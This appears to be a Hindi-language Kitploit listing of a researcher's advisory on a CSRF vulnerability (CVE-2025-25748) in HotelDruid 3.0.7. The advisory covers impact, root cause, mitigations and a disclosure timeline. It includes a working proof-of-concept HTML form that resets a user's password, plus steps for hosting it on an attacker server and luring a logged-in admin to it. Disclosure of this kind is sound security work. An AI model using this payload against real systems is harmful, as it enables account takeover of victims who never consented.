Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2525-25748-Cross-Site-Request-Forgery-CSRF-Vulnerability-in-HotelDruid-3.0.7 — HotelDruid 3.0.7 में क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता (CVE-2025-25748) | Kitploit
उपकरण/GitHubGitHub/huyvo2910/cve-2525-25748-cross-site-request-forgery-csrf-vulnerability-in-hoteldruid-3.0.7
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubhuyvo2910/cve-2525-25748-cross-site-request-forgery-csrf-vulnerability-in-hoteldruid-3.0.7

CVE-2525-25748-Cross-Site-Request-Forgery-CSRF-Vulnerability-in-HotelDruid-3.0.7

HotelDruid 3.0.7 में क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता (CVE-2025-25748)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-25748-Cross-Site-Request-Forgery-CSRF-Vulnerability-in-HotelDruid-3.0.7

विवरण

HotelDruid 3.0.7 में gestione_utenti.php एंडपॉइंट पर एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता हमलावरों को प्रमाणित उपयोगकर्ताओं की ओर से अनधिकृत कार्य (जैसे, उपयोगकर्ता पासवर्ड संशोधित करना) करने की अनुमति देती है, जो ऑरिजिन या रेफ़रर सत्यापन की कमी और CSRF टोकन की अनुपस्थिति का शोषण करती है।


प्रभाव

  • अनधिकृत पासवर्ड परिवर्तन: हमलावर उपयोगकर्ता पासवर्ड को ओवरराइट कर सकते हैं, जिससे पूर्ण खाता अधिग्रहण होता है।
  • सत्र राइडिंग: हमलावर पीड़ित के सक्रिय सत्र का लाभ उठाकर अनधिकृत प्रशासनिक परिवर्तन कर सकता है।
  • डेटा उल्लंघन जोखिम: यदि प्रशासनिक खातों से समझौता किया जाता है, तो संवेदनशील उपयोगकर्ता और संचालन डेटा उजागर या परिवर्तित हो सकता है।

यह भेद्यता सभी उपयोगकर्ता खातों — जिसमें प्रशासनिक खाते भी शामिल हैं — को उपयोगकर्ता की सहमति के बिना अनधिकृत परिवर्तनों के लिए उजागर करती है।


प्रूफ ऑफ कॉन्सेप्ट (PoC)

PoC HTML फ़ॉर्म

निम्नलिखित दुर्भावनापूर्ण फ़ॉर्म दर्शाता है कि कैसे एक हमलावर लॉग-इन प्रशासक को उपयोगकर्ता आईडी 2 का पासवर्ड maliciouspassword में बदलने के लिए मजबूर कर सकता है:

root@kitploit:~
<form method="POST" action="http://localhost/hoteldruid/gestione_utenti.php">    <input type="hidden" name="anno" value="2025">    <input type="hidden" name="id_sessione" value="20250118062407or6tODG42f79QvMA2429">    <input type="hidden" name="modifica_pass" value="SI">    <input type="hidden" name="id_utente_pass" value="2">    <input type="hidden" name="prima_pass" value="maliciouspassword">    <input type="hidden" name="seconda_pass" value="maliciouspassword">    <button type="submit">Submit</button></form>

हमले की होस्टिंग और लॉन्चिंग

उपरोक्त कोड को csrf_attack.html के रूप में सेव करें।

इसे Python का उपयोग करके (हमलावर-नियंत्रित सर्वर) सर्व करें:

root@kitploit:~
python3 -m http.server 8080

पीड़ित को यहाँ निर्देशित करें:

root@kitploit:~
http://<attacker-ip>:8080/csrf_attack.html

एक बार सबमिट होने पर, फ़ॉर्म पीड़ित के सक्रिय सत्र का उपयोग करके होटलड्रूइड को अनुरोध भेजता है, उपयोगकर्ता आईडी 2 का पासवर्ड बदलकर maliciouspassword कर देता है।


विश्लेषण

पृष्ठभूमि

HotelDruid होटल और छुट्टी किराये के लिए व्यापक रूप से उपयोग की जाने वाली ओपन-सोर्स संपत्ति प्रबंधन प्रणाली है। उपयोगकर्ता प्रबंधन के लिए प्रशासनिक नियंत्रण वाली बहु-उपयोगकर्ता प्रणाली होने के नाते, यह सुनिश्चित करना कि केवल अधिकृत उपयोगकर्ता ही खाता क्रेडेंशियल्स को संशोधित कर सकें, समग्र सिस्टम सुरक्षा के लिए महत्वपूर्ण है।

CSRF भेद्यताएँ किसी सर्वर द्वारा उपयोगकर्ता के ब्राउज़र सत्र पर रखे गए विश्वास का शोषण करती हैं। यदि कोई पीड़ित लॉग इन है और किसी दुर्भावनापूर्ण पृष्ठ पर जाता है, तो पृष्ठ पीड़ित के सक्रिय सत्र का उपयोग करके चुपचाप असुरक्षित एप्लिकेशन को अनधिकृत अनुरोध सबमिट कर सकता है। HotelDruid में, महत्वपूर्ण कार्यों — जैसे उपयोगकर्ता पासवर्ड बदलना — पर CSRF रक्षा की कमी हमलावरों को उपयोगकर्ता के किसी भी इंटरैक्शन के बिना (केवल एक दुर्भावनापूर्ण लिंक पर जाने से) खातों से पूरी तरह समझौता करने की अनुमति देती है।


भेद्यता विवरण

प्रभावित एंडपॉइंट

  • gestione_utenti.php

प्रभावित पैरामीटर

  • modifica_pass
  • id_utente_pass
  • prima_pass
  • seconda_pass

मूल कारण

  • फ़ॉर्म में कोई एंटी-CSRF टोकन मौजूद नहीं है और सर्वर-साइड पर मान्य नहीं किया जाता है।
  • Origin या Referer हेडर का कोई सत्यापन नहीं किया जाता है।
  • एप्लिकेशन बाहरी साइटों से उत्पन्न लोगों सहित आने वाले POST अनुरोधों पर आँख मूंदकर भरोसा करता है।

शोषण प्रवाह

  1. हमलावर gestione_utenti.php को लक्षित करते हुए पूर्व-भरे हुए छिपे हुए फ़ील्ड के साथ एक दुर्भावनापूर्ण HTML फ़ॉर्म तैयार करता है।
  2. हमलावर एक लॉग-इन HotelDruid उपयोगकर्ता (जैसे, एडमिन) को दुर्भावनापूर्ण पृष्ठ पर जाने के लिए प्रेरित करता है।
  3. पृष्ठ पर जाते ही, फ़ॉर्म स्वचालित रूप से सबमिट हो जाता है, हमलावर द्वारा नियंत्रित मान पर किसी उपयोगकर्ता का पासवर्ड बदलने के लिए एक वैध अनुरोध भेजता है।
  4. पीड़ित के सत्र का उपयोग उनकी जानकारी या सहमति के बिना अनुरोध को अधिकृत करने के लिए किया जाता है।

प्रभाव

  • खाता अधिग्रहण: किसी भी उपयोगकर्ता का पासवर्ड (एडमिन खातों सहित) उनकी जानकारी के बिना बदला जा सकता है, जिससे हमलावर को पूर्ण पहुँच मिल जाती है।
  • विशेषाधिकार वृद्धि: हमलावर पहले निचले-स्तरीय उपयोगकर्ता से समझौता करके और फिर प्रशासनिक कार्यों का उपयोग करके विशेषाधिकार बढ़ा सकते हैं।
  • डेटा अखंडता जोखिम: हमलावर उपयोगकर्ता खातों को संशोधित कर सकते हैं, संभावित रूप से वैध उपयोगकर्ताओं को लॉक आउट कर सकते हैं या बैकडोर पहुँच बना सकते हैं।

शमन/पैचिंग

डेवलपर्स के लिए अनुशंसाएँ

एंटी-CSRF टोकन

  • सभी राज्य-बदलने वाले फ़ॉर्म और अनुरोधों के लिए अद्वितीय एंटी-CSRF टोकन लागू करें और लागू करें।
  • अनुरोधों को संसाधित करने से पहले सर्वर-साइड पर टोकन सत्यापित करें।

रेफ़रर/ओरिजिन हेडर सत्यापन

  • यह सुनिश्चित करने के लिए Referer और Origin हेडर को मान्य करें कि अनुरोध विश्वसनीय उत्पत्ति से आते हैं।

संवेदनशील संचालन को GET अनुरोधों के माध्यम से सीमित करें

  • पासवर्ड परिवर्तन और समान कार्यों को केवल POST अनुरोधों तक सीमित किया जाना चाहिए।
  • URL में संवेदनशील सत्र डेटा (जैसे id_sessione) पास करने से बचें।

सत्र प्रबंधन वृद्धि

  • लॉगिन के बाद सत्र टोकन को पुनर्जीवित करें।
  • जहाँ संभव हो, सत्र टोकन को IP पतों या ब्राउज़र फ़िंगरप्रिंट से बाँधें।

उपयोगकर्ता सूचना

  • पासवर्ड परिवर्तन जैसी संवेदनशील कार्रवाइयाँ होने पर उपयोगकर्ताओं को सूचित करें (ईमेल या इन-ऐप अलर्ट)।

समयरेखा और क्रेडिट

  • खोज तिथि: 16 जनवरी, 2025
  • विक्रेता सूचना: 17 जनवरी, 2025
  • MITRE CVE असाइनमेंट: CVE-2025-25748, 27 फरवरी, 2025
  • सार्वजनिक प्रकटीकरण: 7 मार्च, 2025
  • शोधकर्ता: Huy Vo (सुरक्षा शोधकर्ता)
टूल डाउनलोड करें